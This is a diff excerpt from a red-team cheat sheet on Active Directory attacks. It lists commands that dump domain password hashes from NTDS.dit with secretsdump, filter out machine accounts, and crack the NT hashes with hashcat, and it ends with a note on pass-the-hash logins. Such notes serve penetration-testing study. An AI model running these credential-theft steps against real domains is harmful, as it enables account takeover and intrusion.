lw8192/Red-Team-Rising/ActiveDirectory/Attacks.md

     python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL -outputfile dc-hashes -history
     sed -i '/$:/d' dc-hashes.ntds     #remove machine accounts (end with $:)
+    hashcat -m 1000 -a 0 dc-hashes.ntds ~/path_to_wordlist   #crack NT hashes with a wordlist attack

 Pass the Hash: use psexec or evil-winrm to login with username/ hash (doesn't need to be cracked)